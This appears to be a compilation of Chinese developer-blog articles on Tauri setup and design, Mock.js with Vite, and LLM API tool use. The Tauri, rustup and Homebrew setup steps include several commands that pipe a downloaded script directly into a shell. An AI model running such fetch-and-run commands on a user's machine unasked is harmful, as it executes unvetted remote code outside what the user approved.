因此,Tauri 应用的包体通常更小。官方提到极简应用甚至可以做到小于 600KB(具体体积会随功能、资源、平台不同而变化)。对于“分发成本”“冷启动”“增量更新”等维度,这一点非常有价值。

你在体积优化上可以进一步做:

  • 前端资源按需加载、路由懒加载、压缩图片与字体
  • 关闭不需要的特性与插件
  • 按平台做差异化资源打包

2.3 架构更灵活:前端随意选,原生能力可扩展

Tauri 对前端框架几乎没有限制:只要你的 UI 能编译成 HTML/JS/CSS,就能塞进 Tauri。React、Vue、Svelte、Solid、Angular,甚至纯静态页面都可以。

而当你需要更深层的系统集成时,Tauri 提供了多层扩展路径:

  • 直接用 invoke 做 JS 与 Rust 的桥接

  • 通过 Tauri Plugins 扩展能力,并提供 Swift / Kotlin 绑定(更贴近移动端生态)

  • 如果你需要更底层的窗口与 WebView 控制,还可以直接使用 Tauri 维护的底层库

    • TAO:窗口创建与事件循环
    • WRY:WebView 渲染与封装

这种分层非常“工程化”:你可以先用框架能力快速交付,后续再逐步下沉到插件或更底层库来解决复杂需求。

3. 快速开始:create-tauri-app 一键起项目

Tauri 推荐用 create-tauri-app 来创建项目。最简单的方式之一是直接执行脚本(Bash):

sh <(curl https://create.tauri.app/sh)

创建完成后,你应该马上去看两块内容:

  • Prerequisites(前置依赖):不同平台需要不同依赖(例如 macOS 的 Xcode、Windows 的构建工具链等)
  • Project Structure(项目结构):搞清楚哪些是前端目录、哪些是 Tauri/Rust 侧目录、配置文件分别控制什么

如果你想快速对照学习,也可以参考官方示例仓库的项目结构与特性组合(例如 tauri、plugins-workspace 等示例集合)。

4. 核心工作方式:前端渲染 + 后端命令

Tauri 的开发体验通常长这样:

  1. 前端负责页面与交互
  2. 需要系统能力(文件、系统信息、加密、数据库、通知、窗口控制等)时
  3. 前端通过 invoke 调用 Rust 侧命令(command)
  4. Rust 执行并返回结果给前端渲染

一个“最小心智模型”示例:

前端(JavaScript)调用:

import { invoke } from "@tauri-apps/api/core";

const res = await invoke("greet", { name: "Tauri" });
console.log(res);

后端(Rust)提供命令:

#[tauri::command]
fn greet(name: String) -> String {
  format!("Hello, {}!", name)
}

你可以把它理解为:前端发起 RPC,Rust 侧提供受控的能力接口。这也是 Tauri 安全模型常见的落点:尽量减少命令数量、缩小参数面、做严格校验。

5. 插件体系:把“常用系统能力”模块化

真实项目里,你不可能所有能力都自己从零写。Tauri 维护了一组官方插件,同时社区也提供了大量插件可选。插件的价值在于:

  • 把常见能力(如文件系统、对话框、通知、系统托盘等)标准化
  • 降低跨平台差异处理成本
  • 提供 Swift / Kotlin 绑定,让同一能力在移动端更自然地调用

选型建议(很实用):

  • 能用官方插件优先官方
  • 社区插件重点看:维护频率、issue 响应速度、最近版本发布时间、平台覆盖情况
  • 企业场景建议做一次“插件清单 + 权限与风险评估”,尤其是涉及敏感权限时

6. 什么时候 Tauri 特别合适

如果你符合下面任意一条,Tauri 通常会是很舒服的选择:

  • 想用 Web 技术做 UI,但不想承受“应用包巨大”的成本
  • 对安全与稳定性有要求,希望底座更可审计、更可控
  • 应用需要调用大量系统能力,但希望接口边界清晰
  • 需要跨平台,同时希望后端逻辑更接近系统、性能更好

反过来,如果你的应用强依赖某个特定浏览器内核特性,或者你希望所有用户环境完全一致(不受系统 WebView 差异影响),那你需要额外评估系统 WebView 的兼容边界与测试策略。

7. 总结:Tauri 的“设计哲学”

Tauri 的哲学其实很清楚:

  • UI 用 Web:开发效率高、生态成熟
  • 渲染用系统 WebView:体积小、分发轻
  • 能力层用 Rust/原生:更安全、更稳定、更可控
  • 通过插件与底层库(TAO/WRY)提供从“快速交付”到“深度定制”的梯度

如果你准备开始上手,建议路径是:

  1. 用 create-tauri-app 起项目
  2. 把核心 UI 跑起来
  3. 把系统能力用 invoke 串起来
  4. 再引入必要插件,逐步打磨工程结构与安全边界

Tauri 开发环境 Prerequisites 全攻略(桌面 + 移动端)

作者 HelloReader
2026年2月19日 22:37

1. 先做一个选择题:你要做哪种目标

你只需要安装与你的目标匹配的依赖:

  • 只做桌面端(Windows/macOS/Linux)

    • System Dependencies + Rust
    • 如果 UI 用 React/Vue 等,再装 Node.js
  • 做移动端(Android/iOS)

    • 桌面端全部依赖 + 移动端额外依赖(Android Studio / Xcode 等) (Tauri)

2. Linux:系统依赖怎么装(以 Debian/Ubuntu 为例)

Tauri 在 Linux 上需要 WebView(GTK WebKit)、构建工具链、OpenSSL、托盘/图标相关库等。不同发行版包名会有差异。 (Tauri)

Debian/Ubuntu 常用依赖(官方示例):

sudo apt update
sudo apt install libwebkit2gtk-4.1-dev \
  build-essential \
  curl \
  wget \
  file \
  libxdo-dev \
  libssl-dev \
  libayatana-appindicator3-dev \
  librsvg2-dev

几个经验点:

  • 看到 openssl-sys 相关报错,优先检查 libssl-dev / openssl 开发包是否安装齐全;必要时设置 OPENSSL_DIR。 (GitHub)
  • 如果你在对照旧文章(Tauri v1)装 libwebkit2gtk-4.0-dev,在新系统(如 Ubuntu 24)可能会遇到仓库里没有的情况;v2 文档用的是 4.1。 (GitHub)
  • 打包 Debian 包时,运行时依赖一般会包含 libwebkit2gtk-4.1-0libgtk-3-0,托盘用到还会带 libappindicator3-1(这有助于你排查“运行环境缺库”问题)。 (Tauri)

装完 Linux 依赖后,下一步直接装 Rust。

3. macOS:Xcode 是关键

macOS 上 Tauri 依赖 Xcode 及其相关开发组件,安装来源两种:

  • Mac App Store
  • Apple Developer 网站下载

安装后一定要启动一次 Xcode,让它完成首次配置。 (Tauri)

仅做桌面端:装好 Xcode → 继续安装 Rust 要做 iOS:除了 Xcode,还要按 iOS 章节继续装 targets、Homebrew、CocoaPods(后面会写)。 (Tauri)

4. Windows:C++ Build Tools + WebView2(MSI 还可能需要 VBSCRIPT)

4.1 安装 Microsoft C++ Build Tools

安装 Visual Studio C++ Build Tools 时,勾选 “Desktop development with C++”(桌面 C++ 开发)。 (Tauri)

4.2 安装 WebView2 Runtime

Tauri 在 Windows 用 Microsoft Edge WebView2 渲染内容。

  • Windows 10(1803+)/ Windows 11 通常已预装 WebView2,可跳过安装步骤
  • 如果缺失,安装 WebView2 Runtime(文档建议 Evergreen Bootstrapper) (Tauri)

4.3 只有当你要打 MSI 安装包时:检查 VBSCRIPT

当你的 tauri.conf.json 使用 "targets": "msi""targets": "all",构建 MSI 可能会依赖系统的 VBSCRIPT 可选功能;若遇到类似 light.exe 执行失败,可去 Windows 可选功能里启用 VBSCRIPT。 (Tauri)

做完 Windows 依赖后,下一步装 Rust。

5. Rust:所有平台都必须装(用 rustup)

Tauri 基于 Rust,因此开发必装 Rust 工具链。官方推荐 rustup: (Tauri)

curl --proto '=https' --tlsv1.2 https://sh.rustup.rs -sSf | sh

安装后建议:

  • 关闭并重开终端(有时需要重启系统)让 PATH 生效 (Tauri)

6. Node.js:只有当你用 JS 前端生态时才需要

如果你的 UI 用 React/Vue/Svelte 等 JavaScript 生态,就安装 Node.js(建议 LTS),并验证:

node -v
npm -v

想用 pnpm / yarn 等,可以按需启用 corepack:

corepack enable

同样建议重开终端确保命令可用。 (Tauri)

7. 移动端额外依赖:Android / iOS

7.1 Android(跨平台都能做)

核心步骤:

  1. 安装 Android Studio
  2. 设置 JAVA_HOME(指向 Android Studio 的 JBR)
  3. 用 SDK Manager 安装:Platform、Platform-Tools、NDK(Side by side)、Build-Tools、Command-line Tools
  4. 设置 ANDROID_HOMENDK_HOME
  5. 用 rustup 添加 Android targets (Tauri)

环境变量示例(Linux/macOS):

export JAVA_HOME=/opt/android-studio/jbr
export ANDROID_HOME="$HOME/Android/Sdk"
export NDK_HOME="$ANDROID_HOME/ndk/$(ls -1 $ANDROID_HOME/ndk)"

添加 targets:

rustup target add aarch64-linux-android armv7-linux-androideabi i686-linux-android x86_64-linux-android

常见坑:

  • tauri android initNDK_HOME environment variable isn't set:基本就是 NDK 没装或环境变量没指到正确 NDK 目录。 (GitHub)

7.2 iOS(仅 macOS)

iOS 开发必须是 macOS + Xcode(注意是 Xcode 本体,不是只装 Command Line Tools)。 (Tauri)

步骤:

  1. rustup 添加 iOS targets
rustup target add aarch64-apple-ios x86_64-apple-ios aarch64-apple-ios-sim
  1. 安装 Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
  1. 安装 CocoaPods
brew install cocoapods

完成后就可以进入创建项目/初始化移动端的流程。 (Tauri)

8. 快速自检清单(装完别急着开写代码)

你可以用这几个“最小验证”确认环境 OK:

  • Rust 是否可用:rustc -Vcargo -V
  • Node 是否可用(如需要):node -vnpm -v
  • Windows:是否装了 C++ Build Tools;WebView2 是否存在(Win10 1803+ 通常无需额外装) (Tauri)
  • Linux:libssl-dev / WebKitGTK dev 包是否装齐(遇到 openssl-sys 错误优先查这块) (GitHub)
  • Android:ANDROID_HOMENDK_HOME 是否指向正确目录 (GitHub)

后端跑路了怎么办?前端工程师用 Mock.js 自救实录

作者 NEXT06
2026年2月17日 22:22

在现代 Web 应用的开发流程中,前后端分离已成为行业标准。然而,在实际协作中,前端工程师常常面临“后端接口未就绪、联调环境不稳定、异常场景难以复现”等痛点。这些问题导致前端开发进度被迫依赖后端,严重制约了交付效率。

Mock.js 作为一种数据模拟解决方案,不仅能解除这种依赖,还能通过工程化的方式提升代码的健壮性。本文将从架构视角出发,深入剖析 Mock.js 的核心价值、技术原理,并结合 Vite 生态展示如何在现代项目中落地最佳实践,同时客观分析其局限性与应对策略。

一、 核心价值:为何引入 Mock.js

在工程化体系中,Mock.js 不仅仅是一个生成随机数据的库,它是实现“并行开发”的关键基础设施。

  1. 解除依赖,并行开发
    传统模式下,前端需等待后端 API 开发完成并部署后才能进行数据交互逻辑的编写。引入 Mock.js 后,只要前后端约定好接口文档(API Contract),前端即可通过模拟数据独立完成 UI 渲染和交互逻辑,将开发流程从“串行”转变为“并行”。
  2. 高保真的数据仿真
    相比于手动硬编码的 test 或 123 等无意义数据,Mock.js 提供了丰富的数据模板定义(Schema)。它能生成具有语义化的数据,如随机生成的中文姓名、身份证号、布尔值、图片 URL、时间戳等。这使得前端在开发阶段就能发现因数据长度、类型或格式引发的 UI 适配问题。
  3. 边界条件与异常流测试
    真实后端环境往往难以稳定复现 500 服务器错误、404 资源丢失或超长网络延迟。Mock.js 允许开发者通过配置轻松模拟这些极端情况,验证前端在异常状态下的容错机制(如 Loading 状态、错误提示、重试逻辑)是否健壮。

二、 技术原理与现代实现方案

1. 原生拦截原理

Mock.js 的核心原理是重写浏览器原生的 XMLHttpRequest 对象。当代码发起请求时,Mock.js 会在浏览器端拦截该请求,判断 URL 是否匹配预定义的规则。如果匹配,则阻止网络请求的发出,并直接返回本地生成的模拟数据;如果不匹配,则放行请求。

2. 现代工程化方案:Vite + vite-plugin-mock

直接在业务代码(如 main.js)中引入 Mock.js 是一种侵入性较强的做法,且原生 Mock.js 拦截请求后,浏览器的 Network 面板无法抓取到请求记录,给调试带来不便。

在 Vite 生态中,推荐使用 vite-plugin-mock。该插件在开发环境(serve)下,通过 Node.js 中间件的形式拦截请求。这意味着请求真正从浏览器发出并到达了本地开发服务器,因此可以在 Network 面板清晰查看请求详情,体验与真实接口完全一致。

三、 实战演练:构建可分页的列表接口

以下将展示如何在 Vite + TypeScript 项目中集成 Mock.js,并实现一个包含逻辑处理(分页、切片)的模拟接口。

1. 项目目录结构

建议将 Mock 数据与业务代码分离,保持目录结构清晰:

Text

project-root/
├── src/
├── mock/
│   ├── index.ts        # Mock 服务配置
│   └── user.ts         # 用户模块接口
│   └── list.ts         # 列表模块接口(本例重点)
├── vite.config.ts      # Vite 配置
└── package.json

2. 环境配置 (vite.config.ts)

通过配置插件,确保 Mock 服务仅在开发模式下启动,生产构建时自动剔除。

TypeScript

import { defineConfig } from 'vite';
import vue from '@vitejs/plugin-vue';
import { viteMockServe } from 'vite-plugin-mock';

export default defineConfig(({ command }) => {
  return {
    plugins: [
      vue(),
      viteMockServe({
        // mock 文件存放目录
        mockPath: 'mock',
        // 仅在开发环境开启 mock
        localEnabled: command === 'serve',
        // 生产环境关闭,避免 mock 代码打包到生产包中
        prodEnabled: false, 
      }),
    ],
  };
});

3. 编写复杂分页接口 (mock/list.ts)

模拟接口不仅仅是返回死数据,更需要具备一定的逻辑处理能力。以下代码演示了如何利用 Mock.js 生成海量数据,并根据前端传入的 page 和 pageSize 参数进行数组切片,模拟真实的数据库查询行为。

TypeScript

import { MockMethod } from 'vite-plugin-mock';
import Mock from 'mockjs';

// 1. 生成模拟数据池
// 使用 Mock.js 模板语法生成 100 条具有语义的列表数据
const dataPool = Mock.mock({
  'list|100': [
    {
      'id|+1': 1, // ID 自增
      author: '@cname', // 随机中文名
      title: '@ctitle(10, 20)', // 10-20字的中文标题
      summary: '@cparagraph(2)', // 随机段落
      'tags|1-3': ['@string("lower", 5)'], // 随机标签数组
      publishDate: '@datetime', // 随机时间
      cover: '@image("200x100", "#50B347", "#FFF", "Mock.js")', // 占位图
      views: '@integer(100, 5000)', // 随机阅读量
    },
  ],
});

// 2. 定义接口逻辑
export default [
  {
    url: '/api/get-article-list',
    method: 'get',
    response: ({ query }) => {
      // 获取前端传递的分页参数,默认为第一页,每页10条
      const page = Number(query.page) || 1;
      const pageSize = Number(query.pageSize) || 10;

      const list = dataPool.list;
      const total = list.length;

      // 核心逻辑:计算分页切片
      const start = (page - 1) * pageSize;
      const end = start + pageSize;
      // 模拟数组切片,返回对应页的数据
      const pageData = list.slice(start, end);

      // 返回标准响应结构
      return {
        code: 200,
        message: 'success',
        data: {
          items: pageData,
          total: total,
          currentPage: page,
          pageSize: pageSize,
        },
      };
    },
  },
] as MockMethod[];

四、 Mock.js 的典型使用场景

  1. 项目原型与演示:在后端架构尚未搭建之前,前端可快速构建包含完整数据流的高保真原型,用于产品评审或客户演示。
  2. 单元测试与集成测试:在 Jest 等测试框架中,利用 Mock 屏蔽外部网络依赖,确保测试用例的运行速度和结果的确定性。
  3. 离线开发:在高铁、飞机等无网络环境下,通过本地 Mock 服务继续进行业务逻辑开发。
  4. 异常流复现:针对超时、空数据、字段缺失等后端难以配合构造的场景进行针对性开发。

五、 深度解析:局限性与弊端

尽管 Mock.js 极大提升了开发效率,但作为一名架构师,必须清晰认知其局限性,以避免在工程落地时产生负面影响。

1. Network 面板不可见问题

原生 Mock.js 通过重写 window.XMLHttpRequest 实现拦截。这种机制发生在浏览器脚本执行层面,请求并未真正进入网络层。因此,开发者在 Chrome DevTools 的 Network 面板中无法看到这些请求,导致调试困难(只能依赖 console.log)。

  • 解决方案:使用 vite-plugin-mock 或 webpack-dev-server 的中间件模式。这种模式在本地 Node 服务端拦截请求,浏览器感知到的是真实的 HTTP 请求,从而解决了 Network 面板不可见的问题。

2. Fetch API 兼容性

原生 Mock.js 仅拦截 XMLHttpRequest,而现代前端项目大量使用 fetch API。若直接使用原生 Mock.js,fetch 请求将无法被拦截,直接穿透到网络。

  • 解决方案:使用 mockjs-fetch 等补丁库,或者坚持使用基于 Node 中间件的拦截方案(如上述 Vite 插件方案),因为中间件方案对前端请求库(Axios/Fetch)是透明的。

3. 数据契约的一致性风险(联调火葬场)

这是 Mock.js 使用中最大的风险点。前端编写的 Mock 数据结构(字段名、类型、层级)完全依赖于开发者的主观定义或早期的接口文档。一旦后端在开发过程中修改了字段(例如将 userId 改为 uid,或将 money 类型由数字改为字符串),而前端 Mock 未及时同步,就会导致“本地开发一切正常,上线联调全面崩溃”的现象。

六、 最佳实践与总结

为了最大化 Mock.js 的收益并规避风险,建议团队遵循以下最佳实践:

  1. 严格的环境隔离:务必在构建配置中通过 Tree Shaking 或环境变量控制,确保 Mock 相关代码(包括 mockjs 库本身和 mock 数据文件)绝对不会被打入生产环境的包中,避免增加包体积或泄露开发逻辑。
  2. 统一接口契约:不要依赖口头约定。建议引入 Swagger (OpenAPI) 或 YAPI 等工具管理接口文档。理想情况下,应编写脚本根据 Swagger 文档自动生成 Mock 数据文件,保证 Mock 数据与后端接口定义的一致性。
  3. 适度模拟:Mock 的目的是打通前端逻辑,而非复刻后端业务。对于极度复杂的业务逻辑(如复杂的权限校验、支付流程),应尽早与后端联调,避免在 Mock 层投入过高成本。
  4. 规范化目录:将 Mock 文件视为项目源代码的一部分进行版本管理,保持清晰的模块化结构,便于团队成员协作和维护。

综上所述,Mock.js 是现代前端工程化中不可或缺的利器。通过合理的架构设计和工具选型,它能显著提升前后端协作效率,但开发者也需时刻警惕数据一致性问题,确保从模拟环境到真实环境的平滑过渡。

手把手从 0 诠释大模型 API 的本质: Tools + MCP + Skills

作者 ArcX
2026年2月15日 14:05

本文写于 2026 年 02 月 15 日.

如今 AI Agent 的各种新概念层出不穷:

  • Tools
  • MCP
  • Skills

许多人都会有这样的疑问: Tools 和 MCP 有什么区别? 我用了 MCP 还需要 Tools 吗? Skills 是取代 MCP 的吗? 本文会从 LLM API 的底层设计开始, 一步步介绍 Tools 和 MCP 的区别, 手动实现一个非常简易的 MCP (简易到你会觉得"就这?"), 最后简单提一下 Skills.

几个重要事实

  • 大模型是无状态的, 它对你们的过往对话一点都没有记忆. 每次调用 LLM API, 都是一次全新的请求, 就像换了一个完全陌生的人说话.
  • 大模型本身的开发(或许)很难, 需要很强的数学知识. 但是大模型应用开发不难, 做纯工程开发的传统程序员也可以很快上手.
  • MCP 和 Skills 都是纯工程层面的设施, 和 AI 毫无关系. 也就是说, 在这两个概念出现以前, 你完全可以自己实现一套类似的机制, 不需要 LLM API 支持.

基于以上几个事实, 本文会选择 Anthropic API 来解释. 因为 OpenAI 的 Responses API 提供了一个叫做 previous_response_id 的参数, 很容易误导人以为 LLM 本身有记忆功能. 但实际上 LLM 是没有记忆的, 这个 previous_response_id 并不会给 LLM 使用, 而是 OpenAI 的服务层面的工程设施, 相当于 OpenAI 帮我们存了历史记录, 然后发给 LLM. Conversations API 同理.

相比之下, Anthropic API 就原生了许多, 更容易感受到 LLM API 的本质.

技术栈

请注意区分 @anthropic-ai/sdk@anthropic-ai/claude-agent-sdk. 前者是 Anthropic API 的封装, 本质上是一个 HTTP Client, 封装了大量的调用 API 的方法; 后者是对 Claude Code (Claude CLI) 的封装, 封装了大量调用 claude 命令行的方法.

本文会使用 GLM-4.7-flash 这个兼容 Anthropic API 的免费模型来节约成本, 毕竟 LLM 应用开发最大的痛点就是每次调试运行都需要花钱.

const client = new Anthropic({
  baseURL: 'https://api.z.ai/api/anthropic', // 国际版, 你也可以使用国内版, 国内版认证方式是 apiKey
  authToken: ZAI_API_KEY,
});

Hello World

首先从一个最简单的请求开始:

const resp = await client.messages.create({
  max_tokens: 1024,
  messages: [
    {
      role: 'user',
      content: '英国的首都是哪里',
    },
  ],
  model: 'glm-4.7-flash',
});

console.log(resp);

Output (省略掉不重要的字段):

{
  "id": "msg_202602151117137d34660397a4418d",
  "type": "message",
  "role": "assistant",
  "model": "glm-4.7-flash",
  "content": [
    {
      "type": "text",
      "text": "英国的首都是**伦敦**(London)。"
    }
  ],
  "stop_reason": "end_turn"
}

多轮对话

正如上面反复提到的, LLM 是无状态的, 每次调用都像是一个全新的完全陌生的人对话. 想象一下, 如果你要和一个人聊天, 每聊完一句, 对面都会换一个人, 那么对方换的人应该如何继续和你的聊天? 当然就是把你之前的聊天历史全部看一遍. 所以调用 LLM 的时候, 每次都需要把历史记录全部传过去.

// 用一个 messages 数组来维护历史记录
const messages: MessageParam[] = [
  {
    role: 'user',
    content: '英国的首都是哪里',
  },
];

const resp = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
});

// 重点: 将 LLM 的第一次回复放到数组里
messages.push({
  role: 'assistant',
  content: resp.content,
});

// 再加入第二次对话内容
messages.push({
  role: 'user',
  content: '介绍一下这个城市的污染情况',
});

console.log(inspect(messages));

const resp2 = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
});

console.log(resp2);

可以看看第二次调用 API 传入的 messages 内容是:

[
  {
    "role": "user",
    "content": "英国的首都是哪里"
  },
  {
    "role": "assistant",
    "content": [
      {
        "type": "text",
        "text": "英国的首都是**伦敦**。"
      }
    ]
  },
  {
    "role": "user",
    "content": "介绍一下这个城市的污染情况"
  }
]

而 resp2 成功返回了伦敦的污染情况, 说明 LLM 确实感知到了上一次对话内容的城市是伦敦.

{
  "id": "msg_20260215115536fd125b1bca954cf6",
  "type": "message",
  "role": "assistant",
  "model": "glm-4.7-flash",
  "content": [
    {
      "type": "text",
      "text": "伦敦作为全球国际化大都市和前工业革命中心,其污染历史可以追溯到维多利亚时代,且至今仍是全球空气质量治理的“典型样本”..." // 我手动省略, 减少篇幅, 并非 LLM 省略
    }
  ],
  "stop_reason": "end_turn"
}

所以你应该也知道了, 所谓的 context windows, 其实可以简单理解为 messages 数组的文本长度, 而不是单条消息的长度.

Tools

原始方法

LLM 就像一个很聪明(虽然有时候会很蠢, 但是我们先假定 LLM 很聪明)的大脑, 但是它只有大脑, 没有眼睛 - 意味着它无法接收外界的信息(除了手动传入的 messages), 比如读一个文件; 没有手 - 意味着它无法做出任何行为, 比如修改一个文件. (可以把 LLM 想象成一个遮住眼睛的霍金).

Tools 就相当于给一个大脑安装了外置眼睛和手. 我们先用最朴素的方式让 LLM 调用工具: 直接在 prompt 里写, 有哪些工具, params 分别是什么, 然后让 LLM 选择一个使用, 并提供 params.

const messages: MessageParam[] = [
  {
    role: 'user',
    content: `写一句话介绍中国农历马年.
      你有以下 tools 可以调用:
      1. { name: "write", description: "write content to a file", params: 
        { "content": {"type": "string", description: "content"} },
        { "path": {"type": "string", description: "the path of the file to write"} },
       }

      2. { name: "read", description: "read content of a file", params: 
        { "path": {"type": "string", description: "the path of the file to read"} }
       }

       请你选择一个工具使用, 并且提供正确的 params. 你需要输出一个 JSON
    `,
  },
];

Output:

{
  "id": "msg_202602151218464370b8983c6c474d",
  "type": "message",
  "role": "assistant",
  "model": "glm-4.7-flash",
  "content": [
    {
      "type": "text",
      "text": "```json\n{\n  \"tool\": \"write\",\n  \"params\": {\n    \"content\": \"中国农历马年象征着奔腾不息的活力与豪迈,寓意着奋进、自由与驰骋。\",\n    \"path\": \"/马年介绍.txt\"\n  }\n}\n```"
    }
  ],
  "stop_reason": "end_turn"
}

可以看到, LLM 做到了选择正确的工具, 提供的参数内容倒是没问题, 但是存在以下几个巨大的问题:

  1. 返回的 text 本质上是个字符串. 虽然在 prompt 里明确要求了需要返回一个 JSON, 但是 LLM 依然返回了一个 JSON markdown, 而不是纯 JSON 字符串.
  2. prompt 并不可靠. LLM 无法做到 100% 遵循 prompt, 尤其是能力比较差的模型, 它可能会输出"好的, 下面是我调用工具的 JSON: xxx". 也就是说, 并不能保证输出一定是一个 JSON markdown.
  3. 就算输出是一个 JSON markdown, 我们还需要去解析这个 markdown, 一旦涉及到嵌套, 也就是 params 里也包含反引号, 会更加复杂.
  4. 无法保证输出的 JSON 100% 遵循了 prompt 里的格式, 比如我在调用的时候就出现过返回了 arguments 字段, 而不是 params.

基于以上问题, Tool Use (或者叫 Tool Call, Function Call, 一个意思. Anthropic 的官方术语是 Tool Use) 被内置进了 LLM, 成为了 LLM 自身的一个能力. 也就是说, 如果一个 LLM 不支持 Tool Use, 那么我们基本是没法在工程层面去做 polyfill, 也就无法实现调用 tool.

标准方法

上面的例子, 换标准的 Tool Use 方法:

const messages: MessageParam[] = [
  {
    role: 'user',
    content: `写一个关于中国农历马年的一句话介绍, 写入 test.txt 里`,
  },
];

const resp = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
  tools: [
    {
      name: 'write',
      description: 'write content to a file',
      input_schema: {
        type: 'object',
        properties: {
          content: {
            type: 'string',
            description: 'content',
          },
          path: {
            type: 'string',
            description: 'the path of the file to write',
          },
        },
      },
    },
    // read 同理, 省略掉
  ],
});

Output:

{
  "id": "msg_20260215123307fffbbd1b9fd84652",
  "type": "message",
  "role": "assistant",
  "model": "glm-4.7-flash",
  "content": [
    {
      "type": "text",
      "text": "我来写一句关于中国农历马年的介绍并保存到文件中。"
    },
    {
      "type": "tool_use",
      "id": "call_49f0c1dbe920406192ce9347",
      "name": "write",
      "input": {
        "content": "中国农历马年象征着活力、热情与自由,是充满朝气与拼搏精神的吉祥年份。",
        "path": "test.txt"
      }
    }
  ],
  "stop_reason": "tool_use"
}

可以看到这次的 content 里多了一个 tool_use 的 block, 里面写明了需要调用的 tool 的名字和参数. 这个 block 的类型是结构化的, 也就是说可以 100% 保证格式是正确, 符合预期的 (但是不能保证 100% 有这个 block, 取决于 LLM 的能力, 太蠢的 LLM 可能无法决策到底用哪个 tool). 这样我们就可以根据这个结构化的 tool_use block, 去执行对于的函数调用.

结果回传

考虑一个场景: 让 LLM 阅读一个文件并分析内容. 经过上面的内容, 你应该知道具体的流程是:

  1. User 要求 LLM 阅读某个文件并分析内容, 并且传入 read tool schema
  2. LLM 决定使用 read tool, 参数是文件路径
  3. User 根据路径读取文件内容, 然后传给 LLM
  4. LLM 成功输出分析结果
const tools: ToolUnion[] = [
  // 本文省略具体内容, read 和 write 两个 tools
];

const messages: MessageParam[] = [
  {
    role: 'user',
    content: `分析一下 package.json`,
  },
];

// 初始请求
const resp = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
  tools,
});

// 把 LLM 的第一次返回加入到 messages 里
messages.push({
  role: 'assistant',
  content: resp.content,
});

// 第一次返回大概率会包含 tool_use block
// content 是一个数组, 可能额外包含一个 text, 也可能直接就是一个 tool_use
// content 可能包含多个 tool_use, 用户需要把所有的都调用, 然后根据 tool_use_id 去匹配结果
const toolUseResults: ContentBlockParam[] = [];
for (const block of resp.content) {
  if (block.type === 'tool_use') {
    switch (block.name) {
      case 'read':
        try {
          const content = await readFile(block.input.path, 'utf-8');
          toolUseResults.push({ tool_use_id: block.id, type: 'tool_result', content, is_error: false }); // is_error 告诉 LLM 这个调用是否成功
        } catch (err) {
          toolUseResults.push({
            tool_use_id: block.id,
            type: 'tool_result',
            content: JSON.stringify(err),
            is_error: true,
          });
        }

        break;

      case 'write':
        try {
          await writeFile(block.input.path, block.input.content);

          toolUseResults.push({ tool_use_id: block.id, type: 'tool_result', content: 'success', is_error: false });
        } catch (err) {
          toolUseResults.push({
            tool_use_id: block.id,
            type: 'tool_result',
            content: JSON.stringify(err),
            is_error: true,
          });
        }
        break;
    }
  }
}
// 将 tool use results 传给 LLM
messages.push({ role: 'user', content: toolUseResults });

console.log(inspect(messages));

const resp2 = await client.messages.create({
  max_tokens: 1024,
  messages,
  model: 'glm-4.7-flash',
  tools,
});
console.log(resp2);

第二次传给 LLM 的 messages 为:

[
  {
    "role": "user",
    "content": "分析一下 package.json"
  },
  {
    "role": "assistant",
    "content": [
      {
        "type": "text",
        "text": "我来帮你分析 package.json 文件。首先,我需要读取这个文件来查看它的内容。"
      },
      {
        "type": "tool_use",
        "id": "call_eeb390dfe8f345269ff95f42",
        "name": "read",
        "input": {
          "path": "package.json"
        }
      }
    ]
  },
  {
    "role": "user",
    "content": [
      {
        "tool_use_id": "call_eeb390dfe8f345269ff95f42",
        "type": "tool_result",
        "content": "{\n  \"name\": \"gh-scout\",\n  \"module\": \"index.tsx\",\n  \"type\": \"module\",\n  \"private\": true,\n  \"devDependencies\": {\n    \"@types/bun\": \"latest\"\n  },\n  \"peerDependencies\": {\n    \"typescript\": \"^5\"\n  },\n  \"dependencies\": {\n    \"@anthropic-ai/sdk\": \"^0.74.0\"\n  }\n}\n",
        "is_error": false
      }
    ]
  }
]

第二次从 LLM 返回的结果为:

{
  "id": "msg_2026021512452122fcf4da65474784",
  "type": "message",
  "role": "assistant",
  "model": "glm-4.7-flash",
  "content": [
    {
      "type": "text",
      "text": "## 📦 `package.json` 文件分析\n\n### 基本信息\n\n| 字段 | 值 | 说明 |\n|------|-----|------|\n| **name** | `\"gh-scout\"` | 项目名称,用于 npm 包标识 |\n| **module** | `\"index.tsx\"` | ES 模块入口文件 |\n| **type** | `\"module\"` | 使用 ES6 模块语法 |\n| **private** | `true` | 标记为私有项目,防止误发布到 npm |\n\n### 依赖管理\n\n#### 🔧 开发依赖 (`devDependencies`)\n```json\n\"@types/bun\": \"latest\"\n```\n- 类型定义包,用于 Bun 运行时的 TypeScript 类型支持\n- `\"latest\"` 表示使用最新版本\n\n#### 🤝 对等依赖 (`peerDependencies`)\n```json\n\"typescript\": \"^5\"\n```\n- **关键点**:`typescript` 被标记为对等依赖\n- 这意味着**项目不直接依赖 TypeScript**,而是期望用户环境中已安装 TypeScript\n- 适用于插件/工具类项目,让用户自己选择 TS 版本\n\n#### ⚡ 运行时依赖 (`dependencies`)\n```json\n\"@anthropic-ai/sdk\": \"^0.74.0\"\n```\n- Anthropic AI 的官方 SDK\n- 版本范围 `^0.74.0` 表示安装 0.74.0 或更高版本(不超过主版本号)\n\n---\n\n### 📝 总结\n\n这是一个**轻量级的 TypeScript 工具项目**(`gh-scout`),主要特点:\n\n1. **无运行时依赖**:除了 Anthropic SDK 外,没有其他运行时依赖\n2. **依赖 TypeScript**:用户自己提供 TS 环境\n3. **使用 Bun**:通过 `@types/bun` 表明使用 Bun 运行环境\n4. **模块化设计**:ES 模块类型,入口为 `index.tsx`\n\n项目看起来是一个与 GitHub 相关的工具(从名字 \"gh-scout\" 推测),可能用于分析或监控 GitHub 相关的操作。"
    }
  ],
  "stop_reason": "end_turn"
}

可以看到, LLM 第一次告诉我们需要调用 read tool 来读取文件内容. 我们调用完毕后把结果传给 LLM, LLM 第二次就成功分析出了内容.

插个题外话: 看到这里, 你应该也觉得原生 LLM 的方式实在是太繁琐了.

  • messages 要手动维护
  • tool_use 要手动解析 LLM 的返回, 手动调用, 然后手动把结果传到 messages 数组里
  • 如果 LLM 后续还要调用其他 tools, 还需要手动写一个循环

